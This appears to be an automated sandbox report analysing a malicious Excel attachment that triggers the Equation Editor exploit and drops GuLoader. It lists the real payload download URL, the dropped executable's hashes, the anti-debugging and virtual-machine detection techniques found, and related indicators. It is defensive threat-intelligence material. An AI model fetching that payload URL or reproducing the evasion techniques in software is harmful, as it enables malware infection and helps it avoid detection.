Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405002 push eax; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040201C push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403A30 push ds; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404ADA push eax; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405A85 push ebx; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004044A2 push ebx; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401CAA pushad ; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404536 push FFFFFFD1h; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401FC6 pushad ; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404DDE push eax; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004039EA push ds; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004023FD push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D8C push edx; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040219D push ebx; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A406 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A402 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A40A push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F6 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F2 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FE push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FA push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EE push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EA push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3C8 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA40A push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA402 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA406 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8E4C push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CE7 pushad ; iretd
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9A push edx; ret
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA3FA push esp; ret

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 000000000040B9F2 second address: 000000000040B9F2 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, 000000A5h 0x00000008 xor eax, edx 0x0000000a pand xmm2, xmm7 0x0000000e jmp 00007FF93438F201h 0x00000010 cmp ch, 0000003Bh 0x00000013 dec edi 0x00000014 cmp dx, 00E4h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FF93438F126h 0x00000022 cmp di, 008Dh 0x00000027 mov ebx, 4E8EE3D3h 0x0000002c cmp bl, FFFFFFE1h 0x0000002f sub ebx, E7F2E312h 0x00000035 cmp ah, 00000049h 0x00000038 fabs 0x0000003a jmp 00007FF93438F200h 0x0000003c xor ebx, 8F76F07Eh 0x00000042 cmp edx, 4Fh 0x00000045 add ebx, 16550F41h 0x0000004b cmp si, 00E6h 0x00000050 cmp eax, 10h 0x00000053 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904

Thread sleep time: -300000s >= -30000s

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235577C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357759 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357DA9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7759 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B577C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA9 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Source: C:\Users\Public\vbc.exe

Code function: 6_2_023567FF LdrInitializeThunk,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Modify Registry1	LSASS Memory	Security Software Discovery521	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion22	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER RFQ1009202.xlsx	36%	Virustotal		Browse
ORDER RFQ1009202.xlsx	27%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	28%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	28%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ggle.io	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://23.95.85.181/msn/vbc.exe	7%	Virustotal		Browse
http://23.95.85.181/msn/vbc.exe	100%	Avira URL Cloud	malware
https://ggle.io/4GZv	1%	Virustotal		Browse
https://ggle.io/4GZv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ggle.io	151.101.65.195	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.85.181/msn/vbc.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ggle.io/4GZv	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.day.com/dam/1.0	91D8F771.emf.0.dr	false		high
http://investor.msn.com/	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.85.181	unknown	United States		36352	AS-COLOCROSSINGUS	true
151.101.65.195	ggle.io	United States		54113	FASTLYUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483003
Start date:	14.09.2021
Start time:	12:15:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ORDER RFQ1009202.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@6/21@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.5% (good quality ratio 13.9%) Quality average: 32.5% Quality standard deviation: 38.2%
HCA Information:	Successful, ratio: 77% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe TCP Packets have been reduced to 100 Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:16:45	API Interceptor	74x Sleep call for process: EQNEDT32.EXE modified
12:17:57	API Interceptor	6x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.65.195	CIh8xCD9fi.exe	Get hash	malicious	Browse	www.beenovus.com/sh2m/?o8bHpX=Vv1hBWZyhVMk+PL/u3xc97YTzZUk7YXVAyZFHG6rpHCWGHDNYKRmSvTI2xLN72Ol48Rf&RFQLz=3fQttPI8YNYDZ
	2089876578 87687.xlsx	Get hash	malicious	Browse	www.sarahpyle.xyz/xle/?-ZoXL=Sh1X2FVe5Axy65E7wsI7ENs8tKQyCAiIe/kznCIOtNfllRMns8OBiZ7gHtjBHXxR1fw3Qg==&qJE0=G0GpifmhvntLyZL
	M0uy4pgQzd.exe	Get hash	malicious	Browse	www.sarahpyle.xyz/xle/?9rq=Sh1X2FVb5Hx26pI3ysI7ENs8tKQyCAiIe/8j7BUPptfklgghrsfN0dDiELjHf2pZ5pEWJVhLUA==&4h0=vTR8SldxW2Clmhi
	Z4bamJ91oo.exe	Get hash	malicious	Browse	www.saraadamchak.com/jskg/?inKP_TF0=D3ZsiJO2yUZadAFwyrxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&oneha=xPMpsZU8
	uqAU5Vneod.exe	Get hash	malicious	Browse	www.saraadamchak.com/jskg/?afcTJPQ8=D3ZsiJO2yUZadAFwyrxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNfWtg+5vXw7I6bISA==&cxoT9=yhvp2Xfp
	http://tracking.samsclub.com/track?type=click&enid=ZWFzPTEmYW1wO21zaWQ9MSZhbXA7YXVpZD0xNTYyMTMxNiZhbXA7bWFpbGluZ2lkPTYyMjA2JmFtcDttZXNzYWdlaWQ9MjYwMCZhbXA7ZGF0YWJhc2VpZD0xNTcxOTQxMzk5JmFtcDtzZXJpYWw9MTY3Nzk5MDgmYW1wO2VtYWlsaWQ9Y2JlbkBjb2xvcmNvYXRpbmMuY29tJmFtcDt1c2VyaWQ9MV8xODAyNiZhbXA7dGFyZ2V0aWQ9JmFtcDtmbD0mYW1wO212aWQ9JmFtcDtleHRyYT0mYW1wOyZhbXA7JmFtcDs=&&&16010&&&metging.web.app/chris.whippNovemberchris.whippchris.whipp#chris.whipp@paragon-europe.com	Get hash	malicious	Browse	metging.web.app/chris.whippNovemberchris.whippchris.whipp
	54188802.exe	Get hash	malicious	Browse	www.naciparaemprender.com/u4xn/?V2JP8=lhidFNnh32PlHZ5&ETmlgNZ=I4SxsSN01AV8LxEDjompoxYKaWnh9pIgkydI9MjqJKMC4C8OhqxVk2syPbNOadpjJdXL

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ggle.io	kernel.exe	Get hash	malicious	Browse	151.101.1.195
	EXCHANGE RATE FOR EXTERNAL MONEY TRANSMITTERS - AMERICA - SEPTEMBER 06.xlsx	Get hash	malicious	Browse	151.101.65.195
	Swipt Copy.docx	Get hash	malicious	Browse	151.101.65.195
	Swipt Copy.docx	Get hash	malicious	Browse	151.101.1.195
	Payment Advice.docx	Get hash	malicious	Browse	151.101.1.195
	Payment Advice.docx	Get hash	malicious	Browse	151.101.1.195

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	swift.xlsx	Get hash	malicious	Browse	198.46.199.171
	Additional Order Qty 197.xlsx	Get hash	malicious	Browse	198.12.107.117
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse	172.245.26.190
	Po2142021.xlsx	Get hash	malicious	Browse	198.12.107.117
	UPDATED SOA - JUNE & JUULY & AUGUST.xlsx	Get hash	malicious	Browse	192.3.146.254
	USD INV#1191189.xlsx	Get hash	malicious	Browse	192.3.146.254
	iRt5DdA7mx	Get hash	malicious	Browse	192.210.163.130
	RC9WOZiZEW	Get hash	malicious	Browse	192.210.163.130
	4m02nQfA9K	Get hash	malicious	Browse	192.210.163.130
	7tgTkWz2S7	Get hash	malicious	Browse	192.210.163.130
	eb13eEZ5Ca	Get hash	malicious	Browse	192.210.163.130
	1KJBt5Fkrl	Get hash	malicious	Browse	192.210.163.130
	pNPv5PPEYC	Get hash	malicious	Browse	192.210.163.130
	WeaLymsKwB	Get hash	malicious	Browse	192.210.163.130
	z1rB9IaC27	Get hash	malicious	Browse	192.210.163.130
	1MnN9Merm4	Get hash	malicious	Browse	192.210.163.130
	P823.xlsx	Get hash	malicious	Browse	192.3.13.11
	msn.xlsx	Get hash	malicious	Browse	23.95.13.175
	Transfer Swift.xlsx	Get hash	malicious	Browse	192.227.158.110
	PO-A5671.xlsx	Get hash	malicious	Browse	198.46.199.203
FASTLYUS	Quotation.jar	Get hash	malicious	Browse	199.232.192.209
	q5tuVZ7Ef1.dll	Get hash	malicious	Browse	151.101.1.44
	lKS018CkVe.dll	Get hash	malicious	Browse	151.101.1.44
	Quotation_562626263667.pdf.js	Get hash	malicious	Browse	199.232.192.209
	RemittanceADV835.htm	Get hash	malicious	Browse	151.101.1.145
	QUOTATION.exe	Get hash	malicious	Browse	151.101.192.119
	caDeEx.dll	Get hash	malicious	Browse	151.101.1.44
	exPlEx.dll	Get hash	malicious	Browse	151.101.1.44
	Bonus Bitcoin - 065540 .htm	Get hash	malicious	Browse	151.101.1.229
	plDeCa.dll	Get hash	malicious	Browse	151.101.1.44
	nextUsDe.dll	Get hash	malicious	Browse	151.101.1.44
	RFQ - R000001095.jar	Get hash	malicious	Browse	199.232.192.209
	Quotation.jar	Get hash	malicious	Browse	199.232.192.209
	RQF 1000281534.jar	Get hash	malicious	Browse	199.232.192.209
	currCurrPl.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	c4DWctbDYR.dll	Get hash	malicious	Browse	151.101.1.44
	090921.dll	Get hash	malicious	Browse	151.101.1.44
	triage_dropped_file.dll	Get hash	malicious	Browse	151.101.1.44
	triage_dropped_file.dll	Get hash	malicious	Browse	151.101.1.44
	crNfx3f2H.dll	Get hash	malicious	Browse	151.101.1.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Signature_Page.-639143_20210913.xlsb	Get hash	malicious	Browse	151.101.65.195
	5QjWQwEJrZ.xlsm	Get hash	malicious	Browse	151.101.65.195
	leakdetails.xlsx	Get hash	malicious	Browse	151.101.65.195
	Purchase Order_01.xlsx	Get hash	malicious	Browse	151.101.65.195
	Additional Order Qty 2.xlsx	Get hash	malicious	Browse	151.101.65.195
	DKHV-0330Q.xlsx	Get hash	malicious	Browse	151.101.65.195
	Document.xlsx	Get hash	malicious	Browse	151.101.65.195
	PS-AVP2-202098-96.docx	Get hash	malicious	Browse	151.101.65.195
	PL_AIR_CAKR21021409.xlsx	Get hash	malicious	Browse	151.101.65.195
	Report.xlsx	Get hash	malicious	Browse	151.101.65.195
	Order no.1480-G22-21202109.xlsx	Get hash	malicious	Browse	151.101.65.195
	SOA.xlsx	Get hash	malicious	Browse	151.101.65.195
	Invoice-No.-6178324435_20210908.xlsb	Get hash	malicious	Browse	151.101.65.195
	Invoice-No.-9004_20210908.xlsb	Get hash	malicious	Browse	151.101.65.195
	FedAch wire confirmation 0032897710.xlsx	Get hash	malicious	Browse	151.101.65.195
	32352788.docx	Get hash	malicious	Browse	151.101.65.195
	1.msi	Get hash	malicious	Browse	151.101.65.195
	Updated+payment+approval.docx	Get hash	malicious	Browse	151.101.65.195
	FCL shipment .doc	Get hash	malicious	Browse	151.101.65.195
	Profoma Invoice.doc	Get hash	malicious	Browse	151.101.65.195

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	73728
Entropy (8bit):	6.0734640463696286
Encrypted:	false
SSDEEP:	1536:YoWKN83Xv+cALoeaAVFyj6Jr7MX0LzxIKt5M/NPpIsx:tWYIXmcA8FAu2JEXEtItI
MD5:	4399C694E88F3F32D22D91C6C4A173ED
SHA1:	FA50DF0581C5591073C6C48D5DFCF575FA272198
SHA-256:	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00
SHA-512:	EBAE4C3A8367F40B1742E7F0A62757AD37C802413C6C274C094520EBD580B475368D812AAE38B881C717BFE03C0AEE9088658D80D0DE4AA02BD9475065BD2260
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 51%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
IE Cache URL:	http://23.95.85.181/msn/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0......\.............@..........................0..............................................4...(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\172EEB4D.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Reputation:	moderate, very likely benign file
